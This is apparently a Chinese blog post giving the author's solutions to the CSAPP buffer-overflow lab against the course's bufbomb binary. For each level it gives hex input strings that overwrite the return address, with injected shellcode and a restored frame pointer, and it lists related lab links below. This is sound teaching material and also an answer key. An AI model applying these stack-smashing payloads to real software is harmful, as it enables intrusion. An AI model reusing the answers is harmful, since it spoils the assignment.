CSAPP:缓冲区炸弹

最新推荐文章于 2025-01-27 22:11:38 发布
原创 最新推荐文章于 2025-01-27 22:11:38 发布 · 782 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#大作业 #计算机系统

答案

学号后六位:001036
第零关:B8 D6 DF 91 1B 68 81 11 40 00 C3 00 C8 FD 19 00 98 FD 19 00
第一关:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F0 11 40 00
第二关:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 12 40 00 00 00 00 00 D6 DF 91 1B
第三关:B8 D6 DF 91 1B A3 04 90 40 00 68 60 12 40 00 C3 98 FD 19 00
第四关:B8 D6 DF 91 1B A3 04 90 40 00 68 B0 12 40 00 C3 98 FD 19 00 80 15 40 00
20240320_084142.png

Overview

  • input的位置main->test->getbuf->getxs
  • 栈中间必然存在一段内容表示getbuf的返回地址,我们要做的就是输入一段较长的字符串,实现对返回地址的覆盖,这样就可以返回到我们想要的地方

第一关

  • 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F0 11 40 00
  • 第一关自动会call _exit,程序会自动退出,所以无需考虑维护栈结构(除第四关外都是如此)
  • 找到输出第一关成功通过的地址004011F0,将返回地址修改到此处
  • 注意小端寻址

第二关

  • 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 12 40 00 00 00 00 00 D6 DF 91 1B
  • 与第一关类似,也是需要把返回地址修改为输出第二关成功通过的地址00401210
  • 第二关比第一关多考虑了一个参数,即cookie(我学号对应的cookie是1B91DFD6)
    • 要求[esp+8]=cookie,注意到esp+8对应输入的第25-28字节,于是把这些位传入我的cookie即可
    • image.png|250

第三关

  • B8 D6 DF 91 1B A3 04 90 40 00 68 60 12 40 00 C3 98 FD 19 00
  • 首先将返回地址修改为0019FD98,即读入机器码的起始地址,这样就可以让程序执行我们输入的指令
  • 本关要求修改global_value的值为cookie
    • image.png|300
    • 所以需要跳转到修改全局变量的地址00409004,并把cookie mov进去
      • image.png|500
  • 之后需要往栈中push进输出第三关通过的地址00401260,最后用ret指令返回
  • 即答案的前16个字节为如下汇编代码的机器码,最后四个字节为机器码的起始地址
mov eax, 0x1B91DFD6
mov [0x00409004], eax
push 0x00401260
ret

第四关

  • B8 D6 DF 91 1B A3 04 90 40 00 68 B0 12 40 00 C3 98 FD 19 00 80 15 40 00
  • 这一关是在第三关的基础上完成的
  • 与其他关卡不同的一点是函数结尾不是exit,如果继续延用第三关密码,pc将ret到输入字符的21-24字节
  • 所以我们需要把ret的地址修改为函数exit的地址00401580
    • image.png
  • 即答案的前16个字节为如下汇编代码的机器码,然后四个字节为机器码的起始地址,最后四个字节为exit的地址
mov eax, 0x1B91DFD6
mov [0x00409004], eax
push 0x004012B0
ret

第零关

  • B8 D6 DF 91 1B 68 81 11 40 00 C3 00 C8 FD 19 00 98 FD 19 00
  • 交的时候才发现还有第零关
  • 注意到这里比较了[ebp+var_4]的值,要想鸟不被杀死,就必须确保getbuf结束后ebp不能被改变,仍为0019FDC8
    • image.png|450
  • 即答案的前12个字节为如下汇编代码的机器码,然后四个字节为ebp原来的值,最后四个字节为机器码的起始地址0019FD98
mov eax, 0x1B91DFD6    
push 0x00401181
ret
CSAPP实验三:缓冲区溢出炸弹(Buflab)
CNFINITE的博客
08-12 9567
本系列文章为中国科学技术大学计算机专业学科基础课《计算机系统》布置的实验,上课所用教材和内容为黑书CSAPP,当时花费很大精力和弯路,现来总结下各个实验,本文章为第三个实验——缓冲区溢出炸弹(Buflab)。 一、实验名称:buflab 二、实验学时: 3 三、实验内容和目的: 掌握函数调用时的栈帧结构,利用输入缓冲区的溢出漏洞,将攻击代码嵌入当前程序的栈帧中,使得程序执行我们所期望的过程 四、实验原理: 溢出的字符将覆盖栈帧上的数据 特...
CSAPP bufLab 缓冲炸弹
One of thre_tigers的博客
05-26 3614
实验题目 CS:APP BufLab 实验目的: 本实验将帮助您详细了解IA-32调用约定和堆栈组织。它涉及到对lab目录中的可执行文件bufbomb应用一系列缓冲区溢出攻击。注意:在本实验室中,您将获得使用操作系统和网络服务器中的安全漏洞的常用方法之一的第一手经验。我们的目的是帮助您了解程序的运行时操作,并理解这种形式的安全缺陷的性质,以便您在编写系统代码时可以避免它。 实验环境:ubuntu12.04 (32位)环境 一.实验内容及操作步骤 Level0: (1)问题描述 Level0任务是让BUFBO
CSAPP 缓冲区溢出炸弹 中科大实验
weixin_44639164的博客
11-08 1353
中科大CSAPP实验三缓冲区溢出炸弹
CSAPP: BombLab 拆炸弹谜题题解(x86 环境)
溡漪幽博客
12-05 8413
这是一个 CSAPP BombLab解题教程,本人在学习 IA-32 汇编指令并完成实验过程中一点浅薄的见解,现在将其整理出来与君分享。 运行一个二进制文件 bomb,它包括六个"阶段(phase)",每个阶段要求学生通过 stdin 输入一个特定的字符串。如果输入了预期的字符串,那么该阶段被"拆除",进入下一个阶段,直到所有炸弹被成功"拆除"。否则,炸弹就会"爆炸",打印出"BOOM!!!"。
CSAPP:BombLab 详细解析
热门推荐
Here is prician
09-27 1万+
Bomb Lab来自《深入理解计算机系统》(CSAPP)一书的第三章的配套实验,该实验的目的是通过反汇编可执行程序,来反推出程序执行内容,进而能够正确破解”密码“,解除“炸弹”。 本实验共有6个phase,对于每个phase,你需要输入一段字符串,然后让代码中explode_bomb函数不执行,这样就不会boom!
csapp:bomb实验查漏补缺
weixin_41477572的博客
04-21 244
AT&T与Intel汇编语法的比较 1)GCC采用的是AT&T的汇编格式, 而微软采用Intel的汇编格式. 1)在AT&T汇编格式中,寄存器名要加上'%'作为前缀;而在Intel汇编格式中,寄存器名不需要加前缀。 2)AT&T和Intel格式中的源操作数和目标操作数的位置正好相反。在Intel汇编格...
CSAPP Lab3:Attack
sinat_38705282的博客
06-04 1443
文章目录一、准备二、ctarget三、rtarget 一、准备 二、ctarget 三、rtarget
CSAPP学习:前言
m0_64615322的博客
01-27 631
本书简称CS:APP。背景知识一些基础的C语言知识如何阅读Do-做系统在真正的系统上解决具体的问题,或是编写和运行程序。章节2025-1-27个人认为如下章节将会对学习408中的操作系统与计算机组成原理提供帮助,于是先凭借记忆将其简单分类,后续将会根据408大纲调整内容,如有错误,欢迎各位指正第1章:计算机系统漫游(操作系统)程序的生命周期第2章:信息的表示和处理(计算机组成原理)计算机中数的表示和运算第3章:程序的机器级表示(计算机组成原理)程序代码的机器级表示。
CSAPP Lab2:Bomb Lab
qq_45418837的博客
08-16 443
csapp Lab2 data bomb记录
CSAPP实验-bomb:二进制炸弹拆解与分析
结合标签信息:“CSAPP, 二进制炸弹, bomb, 实验报告, 反汇编, GDB调试, 汇编语言, 程序分析, 缓冲区溢出, 逆向工程”,我们可以系统地梳理出本实验所涉及的核心知识点。 首先,“反汇编”是本实验的基础技能。由于...
项目极简说明_基于CSAPP课程实验的二进制炸弹拆除与缓冲区溢出攻击实践项目_内容关键词_二进制炸弹拆除实验包含六个主要阶段及一个隐藏阶段每个阶段需通过反汇编和调试技术分析汇编代码.zip
11-30
二进制炸弹拆除实验是一个实践项目,其目的在于通过具体的技术手段来理解和应对潜在的安全威胁,特别是针对缓冲区溢出攻击。该项目依据CSAPP(深入理解计算机系统)课程中的实验内容设计,是计算机安全和系统领域...
CSAPP课程实验完整解决方案-包含数据实验炸弹实验攻击实验体系结构实验缓存实验Shell实验内存分配实验和代理实验-提供计算机系统基础知识的实践平台-位运算缓冲区溢.zip
07-25
此外,实验中涉及的位运算和缓冲区溢出等知识点是计算机科学中非常基础而重要的内容,它们在计算机科学和工程的许多其他领域中都有着广泛的应用。 提供这些实验的完整解决方案,意味着学生将获得详细的指导和参考...
基于Java+SpringBoot+Vue的家具网上商城系统设计与实现源码及文档
最新发布
12-21
本项目旨在构建一个基于Web的家具在线销售平台,该系统致力于实现家具商品的高效数字化管理与用户交互。平台核心功能涵盖:主页展示、个人中心、用户账户管理、家具分类维护、商品信息管理、订单处理及系统配置等模块。管理员通过预设凭证登录后,可全面管理平台的各项业务与数据。 技术实现采用Spring Boot与Node.js作为后端支撑,结合Vue.js前端框架及Element UI组件库,数据库选用MySQL,项目管理依赖Maven。开发环境推荐使用IntelliJ IDEA,同时兼容Eclipse。系统遵循浏览器/服务器(B/S)架构模式,确保跨平台访问的便捷性。 部署时需配置数据库连接参数,相关设置在项目资源文件中指定。初始化数据库可执行提供的SQL脚本。应用启动后,管理员可通过特定路径访问后台管理界面,普通用户则通过前端入口浏览与购买商品。具体技术细节与操作流程可参考附带的文档资料。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
推荐系统基于Java+Vue的联邦学习隐私保护模型设计:分布式协同推荐架构与安全通信实现 项目介绍 基于java+vue的联邦学习的隐私保护推荐系统设计与实现(含模型描述及部分示例代码)
12-21
内容概要:本文详细介绍了一个基于Java和Vue的联邦学习隐私保护推荐系统的设计与实现。系统采用联邦学习架构,使用户数据在本地完成模型训练,仅上传加密后的模型参数或梯度,通过中心服务器进行联邦平均聚合,从而实现数据隐私保护与协同建模的双重目标。项目涵盖完整的系统架构设计,包括本地模型训练、中心参数聚合、安全通信、前后端解耦、推荐算法插件化等模块,并结合差分隐私与同态加密等技术强化安全性。同时,系统通过Vue前端实现用户行为采集与个性化推荐展示,Java后端支撑高并发服务与日志处理,形成“本地训练—参数上传—全局聚合—模型下发—个性化微调”的完整闭环。文中还提供了关键模块的代码示例,如特征提取、模型聚合、加密上传等,增强了项目的可实施性与工程参考价值。 适合人群:具备一定Java和Vue开发基础,熟悉Spring Boot、RESTful API、分布式系统或机器学习相关技术,从事推荐系统、隐私计算或全栈开发方向的研发人员。 使用场景及目标:①学习联邦学习在推荐系统中的工程落地方法;②掌握隐私保护机制(如加密传输、差分隐私)与模型聚合技术的集成;③构建高安全、可扩展的分布式推荐系统原型;④实现前后端协同的个性化推荐闭环系统。 阅读建议:建议结合代码示例深入理解联邦学习流程,重点关注本地训练与全局聚合的协同逻辑,同时可基于项目架构进行算法替换与功能扩展,适用于科研验证与工业级系统原型开发。
基于spring boot的水果商城网站的设计与实现开题报告.docx
12-21
基于spring boot的水果商城网站的设计与实现开题报告
遗传算法的原理及其在实践中的应用(PDF格式)
12-21
源码来自:https://pan.quark.cn/s/a4b39357ea24 遗传算法 - 简书 遗传算法的理论是根据达尔文进化论而设计出来的算法: 人类是朝着好的方向(最优解)进化,进化过程中,会自动选择优良基因,淘汰劣等基因。 遗传算法(英语:genetic algorithm (GA) )是计算数学中用于解决最佳化的搜索算法,是进化算法的一种。 进化算法最初是借鉴了进化生物学中的一些现象而发展起来的,这些现象包括遗传、突变、自然选择、杂交等。 搜索算法的共同特征为: 首先组成一组候选解 依据某些适应性条件测算这些候选解的适应度 根据适应度保留某些候选解,放弃其他候选解 对保留的候选解进行某些操作,生成新的候选解 遗传算法流程 遗传算法的一般步骤 my_fitness函数 评估每条染色体所对应个体的适应度 升序排列适应度评估值,选出 前 parent_number 个 个体作为 待选 parent 种群(适应度函数的值越小越好) 从 待选 parent 种群 中随机选择 2 个个体作为父方和母方。 抽取父母双方的染色体,进行交叉,产生 2 个子代。 (交叉概率) 对子代(parent + 生成的 child)的染色体进行变异。 (变异概率) 重复3,4,5步骤,直到新种群(parentnumber + childnumber)的产生。 循环以上步骤直至找到满意的解。 名词解释 交叉概率:两个个体进行交配的概率。 例如,交配概率为0.8,则80%的“夫妻”会生育后代。 变异概率:所有的基因中发生变异的占总体的比例。 GA函数 适应度函数 适应度函数由解决的问题决定。 举一个平方和的例子。 简单的平方和问题 求函数的最小值,其中每个变量的取值区间都是 [-1, ...
第4讲:RGB-LED 传感器实验.mp4
12-21
Arduino智能硬件开发实战项目
基于MATLAB的频谱图与Bode图绘制方法及实现
12-21
在实验数据处理过程中,频谱图的生成通常涉及多种分析方法。其中,自相关函数法通过计算信号时间序列的自相关特性来估计功率谱密度。另一种常用方法是自回归模型法,该方法基于信号的前期观测值构建线性预测模型,进而推导出频谱分布。这两种技术均被广泛应用于从实验数据中提取频域特征,以实现对信号能量在不同频率上分布状况的可视化呈现。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
RBF神经网络训练:MATLAB实现与源码解析
12-21
【达摩老生系列作品,品质经过严格验证与实测调校】 资源标题:基于径向基函数神经网络的训练实现(MATLAB完整源代码包) 资源类别:MATLAB完整项目工程文件 内容说明: 本资源包含一套经过完整测试与调试的MATLAB源代码,能够确保在标准环境中顺利运行。若在使用过程中遇到执行问题,可提供运行指导或适配调整方案。 适用对象:适用于机器学习及神经网络领域的初学者,以及具备一定编程经验的开发人员。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值